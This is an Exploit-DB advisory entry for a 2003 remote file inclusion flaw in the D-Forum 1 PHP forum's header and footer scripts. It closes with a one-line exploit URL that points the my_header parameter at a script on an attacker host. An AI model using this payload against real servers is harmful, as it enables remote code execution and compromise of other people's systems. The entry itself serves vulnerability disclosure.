D-Forum 1 - 'header' Remote File Inclusion

EDB-ID:

22256


Author:

frog

Type:

webapps


Platform:

PHP

Date:

2003-02-18


source: https://www.securityfocus.com/bid/6879/info

D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.

Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters. 

http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt